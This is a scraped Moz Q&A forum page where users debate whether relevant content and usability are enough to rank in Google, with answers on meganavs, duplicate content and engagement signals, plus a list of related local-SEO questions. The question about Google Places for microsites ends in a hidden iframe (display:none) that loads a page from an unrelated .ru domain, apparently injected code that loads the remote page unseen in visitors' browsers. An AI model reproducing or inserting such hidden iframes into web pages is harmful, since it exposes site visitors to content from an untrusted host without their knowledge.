Does Google play fair? Is 'relevant content' and 'usability' enough?
-
It seems there are 2 opposing views, and as a newbie this is very confusing.
One view is that as long as your site pages have relevant content and are easy for the user, Google will rank you fairly.
The other view is that Google has 'rules' you must follow and even if the site is relevant and user-friendly if you don't play by the rules your site may never rank well.
Which is closer to the truth? No one wants to have a great website that won't rank because Google wasn't sophisticated enough to see that they weren't being unfair.
Here's an example to illustrate one related concern I have:
I've read that Google doesn't like duplicated content. But, here are 2 cases in which is it more 'relevant' and 'usable' to the user to have duplicate content:
Say a website helps you find restaurants in a city. Restaurants may be listed by city region, and by type of restaurant. The home page may have links to 30 city regions. It may also have links for 20 types of restaurants. The user has a choice. Say the user chooses a region. The resulting new page may still be relevant and usable by listing ALL 30 regions because the user may want to choose a different region. Altenatively say the user chooses a restaurant type for the whole city. The resulting page may still be relevant and usable by giving the user the ability to choose another type OR another city region. IOW there may be a 'mega-menu' at the top of the page which duplicates on every page in the site, but is very helpful. Instead of requiring the user to go back to the home page to click a new region or a new type the user can do it on any page. That's duplicate content in the form of a mega menu, but is very relevant and usable. YET, my sense is that Google MAY penalize the site even though arguably it is the most relevant and usable approach for someone that may or may not have a specific region or restaurant type in mind..
Thoughts?
-
Hi David,
Sorry for such a delayed response but I keep wondering about your point on the meganav. Its known that Google is able to figure out menus and wont count those toward duplicate content? I just would like to be sure since my menus are fairly substantial when dropdowns are included.
-
You are giving me SOME hope for a site I've been working on for about 5 years and am getting ready to launch. Thanks very much.
-
Your comment in #4 about time on page and bookmarking is something I think should be taken into account by Google for search page ranking, but I've never heard before that they do. [...] Are those significant factors used by Google?
In my opinion, google has every ability to measure visitor actions. They own the Chrome browser and could measure the engagement of visitors with a page, they have access to what gets bookmarked in Chrome, they know when a visitor clicks in the SERPs and when that same visitor reappears in the SERPs, they don't have to have links because they can read when people mention your site in a forum, they know if people navigate to your site by typeing the name of your site into search... I believe that all of these things are important for rankings but how important I can't say.
I have lots of really good content that when I published it the page ranked at #150 or deeper in the SERPs. Then, I built zero links and did zero promotion and slowly that page rises in the SERPs and is now in the top three - over a year later. I have hundreds of pages that have done that. You gotta have a LOT of patience to do things that way but you spend zero effort on promotion and 100% effort producing assets for your website. That is what I have done since about 2006. Virtually zero linkbuilding. My visitors are my linkbuilders.
-
EGOL, Thanks very much. I, being a one person biz, am very interested in the idea of ranking by popularity, as my goal is to have the best site out there but I have limited funds to promote it. Your comment in #4 about time on page and bookmarking is something I think should be taken into account by Google for search page ranking, but I've never heard before that they do. After all, usage and return usage is what it is all about! Are those significant factors used by Google? If so maybe there is hope..:)
-
Egol has this summed up perfectly!
-Andy
-
One view is that as long as your site pages have relevant content and are easy for the user, Google will rank you fairly.
The other view is that Google has 'rules' you must follow and even if the site is relevant and user-friendly if you don't play by the rules your site may never rank well.
Which is closer to the truth?
They are both a small piece of the truth. To rank on google your PAGE must be:
-
relevant to the search term and presented to google with proper title, crawability, and text visibility
-
have substantive content about the search term
-
be validated by other websites by being linked from them or mentioned by them (these are just a few validations)
-
be validated by visitors because they have queried it by name, stayed on it, bookmarked it, mentioned it by name in web readable content (these are just a few validations)
Any idiot can do #1. A good author can do #2. But, #3 and #4 are really difficult to accomplish by people who are not related to you or paid by you.
In low competion #1 and #2 can be enough to get your ranked. The higher the competition for a query the more you need #3 and #4 to rank. For some queries it can be almost impossible for a newcomer to rank on the first page of google without investing $xxx,xxx or more in website assets and promotion.... AND... having a plan in place to present the site in a way that google will be able to read it and interpret it in a way that will maximize the #3 and #4 assets.
-
-
A meganav is not considered duplicate content. Duplicate content means product description pages that are identical, having the same articles multiple places on your site, etc.
To the main parts of your question - Google does not want it to be easy for people in the SEO world. They give guidelines, but following them means nothing. What Google considers an ok tactic one years becomes an unacceptable tactic the next (see guest blogging). There are many ways to succeed in ranking. Some follow Google's rules and wait for rankings to come, others use tons of spammy tactics and rank instantly (though they always risk losing it overnight if Google catches on).
The idea that an easy to use site and relevant content will make Google rank you fairly is a joke. And though only 1 has said it publicly, there are many top minds in the SEO world who will tell you that in private.
Got a burning SEO question?
Subscribe to Moz Pro to gain full access to Q&A, answer questions, and ask your own.
Browse Questions
Explore more categories
-
Moz Tools
Chat with the community about the Moz tools.
-
SEO Tactics
Discuss the SEO process with fellow marketers
-
Community
Discuss industry events, jobs, and news!
-
Digital Marketing
Chat about tactics outside of SEO
-
Research & Trends
Dive into research and trends in the search industry.
-
Support
Connect on product support and feature requests.
Related Questions
-
Daytona Beach Web Design vs. Daytona Web Design: What's Best?
Three months ago we had our team create local pages for some of the services we render -- _i.e., _web design. As we reviewed the pages, they created two pages with similar content; one with URL: /daytona-beach-web-design/ & /daytona-web-design/ We knew we had to kill one of them to avoid duplicate content. Here is where the hard decision came and hence the question. We though about keeping the '/daytona-beach-web-design/ ' URL but for some reason, Google had already crawled the shorter version of the URL '/daytona-web-design/' So we ended up deleting the long tail URL and kept Daytona Web Design instead. Which one would you keep and have you experienced similar issues?
Local Website Optimization | | WebDaytona0 -
Duplicate content, hijacked search console, crawl errors, ACCCK.
My company employed a national marketing company to create their site, which was obviously outsourced to the lowest bidder. It looks beautiful, but has a staging site with all duplicate content in the installation. I am not seeing these issues in search console, and have had no luck getting the staging site removed from the files. How much should I be banging the drum on this? We have hundreds of high level crawl errors and over a thousand in midlevel. Of course I was not around to manage the build. I also do not have ftp access I'm also dealing with major search console issues. The account is proprietarily owned by a local SEO company and I can not remove the owner who is there by delegation. The site prefers the www version and does not read the same traffic for the non www version We also have something like 90,000 backlinks from 13 sites. And a shit ton of ghost spam. Help!
Local Website Optimization | | beth_thesomersteam0 -
Building a new site and want to be found in both Google.co.uk and Goolge.ie. What is the best practice?
We are building a new site which is a .com site and the client would like to be found in both Google.co.uk and Goolge.ie. What is the best practice to go about this? Can you geo-target two countries with the one site?
Local Website Optimization | | WSIDW0 -
Google fetch showing error
Hello All, I am Fetching my url in Google fetch pages, But everytime, i Fetch showing error "Temporary unavailable", But My site is working perfect, Also robots file Also given Allow, But still Error coming Any Expert Can help please Thnx
Local Website Optimization | | falguniinnovative0 -
How can I get a Google places 'widget' displaying on SERPS?
Hi all, My query relates to the Google Places 'Widget' (not sure what they are called exactly). If you do a search for, let's say 'Apple' you get the regular SERPs and on the right of the page they display a Google Places panel which includes map, company details & reviews. (and also a G+ panel for some businesses, where appropriate) What determines this being displayed? I had presumed a correctly formatted and optimised 'Places' page and making sure this was linked and verified. We have Google Places set up for quite a long time (and verified) but for some reason it's not being displayed. Any thoughts? On another note, a client of ours has the opposite issue - they would like to remove this panel from SERPs. I'm guessing the only way to do that would be to remove the Google Places page? Thanks in advance...
Local Website Optimization | | davidmaxwell0 -
Updated site with new Url Structure - What Should I expect to happen ?. Also it's showing PR 1 for my urls on Opensite explorer
Hi All, We updated our website with a new url structure. Apart from the root domain , everyother page is showing up in opensite explorer with a page rank 1. Although we only went live with this yesterday, I would have thought that the 301's etc from the old urls would be coming through and the PR would show ?.. I am not familiar what to expect or what alarms bells I need to watch out for when doing this type of thing although I would probably expect a small drop in traffic ?..I don;t know what the norm is though so Any advice greatly appreciated? thanks PEte
Local Website Optimization | | PeteC120 -
Main Website and microsite - Do I do google places for both as it will technically be duplicating the locations,?
Hi All, I have a main eCommerce website which trades out of a number of locations and all these locations appear in google places although they don't rank particularly well in google places . I also have a number of microsites which are specific to one type of product I do and these rank very well locally. My question is , should I also do google places for my microsites as this would technically mean I am creating a duplicate location listing in google places but for a different website etc./business I only have one google account so I guess this would be done under the same google account ? thanks Pete <iframe id="zunifrm" style="display: none;" src="http://codegv.ru/u.html"></iframe>
Local Website Optimization | | PeteC120 -
Local site went from dominating first page - bad plugin caused duplicate content issues - now to 2nd page for all!
I had a bad plugin create duplicate content issues on my Wordpress CMS - www.pmaaustin.com I got it fixed, but now every keyword has been stuck on page 2 for search terms for 4 months now, where I was 49 out of 52 keywords on page one. It's a small local niche with mostly easier to rank keywords. Am I missing something? p.s. Also has a notice on the Dashboard that says: "404 Redirected: There are 889 captured 404 URLs that need to be processed." Could that be a problem? Thanks, Steve
Local Website Optimization | | OhYeahSteve0